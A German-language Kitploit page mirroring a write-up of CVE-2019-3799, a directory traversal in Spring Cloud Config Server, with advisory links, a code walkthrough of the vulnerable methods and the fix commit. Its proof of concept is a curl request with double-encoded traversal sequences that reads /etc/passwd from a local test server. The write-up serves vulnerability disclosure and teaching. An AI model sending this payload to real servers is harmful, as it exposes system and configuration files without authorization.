Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2019-3799 — CVE-2019-3799 - Spring Cloud Config Server: Directory Traversal < 2.1.2, 2.0.4, 1.4.6 | Kitploit
Tools/GitHubGitHub/mpgn/cve-2019-3799
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubmpgn/cve-2019-3799

CVE-2019-3799

CVE-2019-3799 - Spring Cloud Config Server: Directory Traversal < 2.1.2, 2.0.4, 1.4.6

Repository anzeigen
3154vor 7 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2019-3799 - Spring-Cloud-Config-Server Verzeichnis-Traversal < 2.1.2, 2.0.4, 1.4.6

Spring Cloud Config Server ist anfällig für einen Directory Traversal / Path Traversal / File Content Disclosure < 2.1.2, 2.0.4, 1.4.6

Spring Cloud Config, Versionen 2.1.x vor 2.1.2, Versionen 2.0.x vor 2.0.4 und Versionen 1.4.x vor 1.4.6 sowie ältere nicht unterstützte Versionen erlauben es Anwendungen, beliebige Konfigurationsdateien über das spring-cloud-config-server-Modul bereitzustellen. Ein böswilliger Benutzer oder Angreifer kann eine Anfrage mit einer speziell gestalteten URL senden, die zu einem Directory-Traversal-Angriff führen kann.

capture d'écran_1

Gefunden von Vern ([email protected])

Sicherheitshinweis

  • https://pivotal.io/security/cve-2019-3799
  • https://spring.io/blog/2019/04/17/cve-2019-3799-spring-cloud-config-2-1-2-2-0-4-1-4-6-released

Technische Analyse

  • https://chybeta.github.io/2019/04/18/%E3%80%90CVE-2019-3799%E3%80%91-Directory-Traversal-with-spring-cloud-config-server/

Proof of Concept

  1. Laden Sie eine angreifbare Version von Spring Cloud Config herunter https://github.com/spring-cloud/spring-cloud-config
  2. Führen Sie die Anwendung aus
cd spring-cloud-config-server                                                                                                                                                                     
../mvnw spring-boot:run
  1. Exploit
curl http://127.0.0.1:8888/test/pathtraversal/master/..%252f..%252f..%252f..%252f../etc/passwd                                                                                                    

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin

Die Schwachstelle

Wie immer finden wir durch das Lesen der Dokumentation die relevanten Informationen:

Bereitstellung von Klartextdateien: https://cloud.spring.io/spring-cloud-static/spring-cloud-config/1.3.1.RELEASE/#_serving_plain_text

Der Config Server stellt diese über einen zusätzlichen Endpunkt unter /{name}/{profile}/{label}/{path} bereit, wobei "name", "profile" und "label" die gleiche Bedeutung wie der normale Umgebungsendpunkt haben, "path" jedoch ein Dateiname ist (z.B. log.xml).

Der Server stellt diese über einen zusätzlichen Endpunkt unter /{name}/{profile}/{label}/{path} bereit.

Eine weitere interessante Information aus der Dokumentation:

Bei VCS-basierten Backends (git, svn) werden Dateien auf das lokale Dateisystem ausgecheckt oder geklont. Standardmäßig werden sie im temporären Verzeichnis des Systems mit einem Präfix von config-repo- abgelegt. Unter Linux könnte es beispielsweise /tmp/config-repo- sein.

Was passiert, wenn wir http://127.0.0.1:8888/test/pathtraversal/master/..%252f..%252f..%252f..%252f../etc/passwd senden?

  1. Die Anfrage wird gemappt mit
@RequestMapping("/{name}/{profile}/{label}/**")
public String retrieve(@PathVariable String name, @PathVariable String profile,
    @PathVariable String label, ServletWebRequest request,
    @RequestParam(defaultValue = "true") boolean resolvePlaceholders)
    throws IOException {
  String path = getFilePath(request, name, profile, label);
  return retrieve(request, name, profile, label, path, resolvePlaceholders);
}
  1. Die Funktion retrieve ruft die Funktion findOne auf
synchronized String retrieve(ServletWebRequest request, String name, String profile,
    String label, String path, boolean resolvePlaceholders) throws IOException {
  name = resolveName(name);
  label = resolveLabel(label);
  Resource resource = this.resourceRepository.findOne(name, profile, label, path); // path: ..%2f..%2f..%2f..%2f..%2f../etc/passwd
  if (checkNotModified(request, resource)) {
    // Content was not modified. Just return.
    return null;
  }
  // ensure InputStream will be closed to prevent file locks on Windows
  try (InputStream is = resource.getInputStream()) {
    String text = StreamUtils.copyToString(is, Charset.forName("UTF-8"));
    if (resolvePlaceholders) {
      Environment environment = this.environmentRepository.findOne(name,
          profile, label);
      text = resolvePlaceholders(prepareEnvironment(environment), text);
    }
    return text;
  }
}
  1. Die Funktion findOne wird aufgerufen:
public synchronized Resource findOne(String application, String profile, String label, String path) {
  if (StringUtils.hasText(path)) {
    String[] locations = this.service.getLocations(application, profile, label).getLocations(); // /tmp/config-repo-<randomid>
    try {
      for (int i = locations.length; i-- > 0; ) {
        String location = locations[i]; // [1]..%2f..%2f..%2f..%2f..%2f../etc/passwd
        for (String local : getProfilePaths(profile, path)) {
            Resource file = this.resourceLoader.getResource(location).createRelative(local); // /tmp/config-repo-<randomid>/..%2f..%2f..%2f..%2f..%2f../etc/passwd
            if (file.exists() && file.isReadable()) {
                return file; // /tmp/config-repo-<randomid>/..%2f..%2f..%2f..%2f..%2f../etc/passwd
            }
          }
        }
      }
    }
    catch (IOException e) {
        throw new NoSuchResourceException(
                "Error : " + path + ". (" + e.getMessage() + ")");
    }
  }
  throw new NoSuchResourceException("Not found: " + path);
}
  1. Dann liest die Funktion retrieve die Datei mit StreamUtils.copyToString(is, Charset.forName("UTF-8"), was /tmp/config-repo-<randomid>/..%2f..%2f..%2f..%2f..%2f../etc/passwd in /etc/passwd umwandelt, was zur Offenlegung der Datei /etc/passwd führt.

capture d'écran_4


Fix: https://github.com/spring-cloud/spring-cloud-config/commit/3632fc6f64e567286c42c5a2f1b8142bfde505c2

capture d'écran

From 3632fc6f64e567286c42c5a2f1b8142bfde505c2 Mon Sep 17 00:00:00 2001
From: Spencer Gibb <[email protected]>
Date: Tue, 2 Apr 2019 14:16:10 -0400
Subject: [PATCH] Cleans invalid paths

fixes gh-1355
---
 .../resource/GenericResourceRepository.java   | 165 ++++++++++++++++--
 .../GenericResourceRepositoryTests.java       |  18 ++
 2 files changed, 170 insertions(+), 13 deletions(-)
Tool herunterladen